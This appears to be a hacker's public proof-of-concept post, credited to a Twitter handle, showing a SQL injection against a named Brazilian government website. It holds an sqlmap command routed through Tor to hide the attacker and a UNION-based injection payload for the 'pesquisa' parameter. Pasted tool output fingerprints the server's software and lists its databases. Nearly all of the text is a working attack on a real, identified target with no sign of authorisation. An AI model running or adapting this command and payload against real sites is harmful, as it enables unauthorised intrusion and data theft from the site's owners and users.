- [Twitter]: https://twitter.com/0xFrenetic
- PoC: http://www.pm.pi.gov.br/buscar.php
- # Execute: ./sqlmap.py --tor --tor-type=SOCKS5 -u http://www.pm.pi.gov.br/buscar.php --form --dbs --random-agent
- PrintScreen: http://i.imgur.com/jkYCB4d.png
- [#2] form:
- POST http://www.pm.pi.gov.br:80/buscar.php
- POST data: pesquisa=
- do you want to test this form? [Y/n/q]
- > Y
- Edit POST data [default: pesquisa=] (Warning: blank fields detected): [Enter]
- do you want to fill blank fields with random values? [Y/n] Y
- [16:30:27] [INFO] POST parameter 'pesquisa' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
- [16:30:27] [INFO] checking if the injection point on POST parameter 'pesquisa' is a false positive
- POST parameter 'pesquisa' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
- sqlmap identified the following injection point(s) with a total of 136 HTTP(s) requests:
- ---
- Parameter: pesquisa (POST)
- Type: UNION query
- Title: Generic UNION query (NULL) - 6 columns
- Payload: pesquisa=EFFw') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qxqbq','NQxxIsSZSEPCyiXZhBQJcBABIkPjScTJREYfLYqR'),'qzkvq')-- rJVs
- ---
- do you want to exploit this SQL injection? [Y/n]
- [16:30:56] [INFO] testing MySQL
- [16:30:58] [INFO] confirming MySQL
- [16:31:01] [INFO] the back-end DBMS is MySQL
- web server operating system: Linux Debian 6.0 (squeeze)
- web application technology: PHP 5.3.3, Apache 2.2.16
- back-end DBMS: MySQL >= 5.0.0
- [16:31:01] [INFO] fetching database names
- available databases [2]:
- [*] conteudopm
- [*] information_schema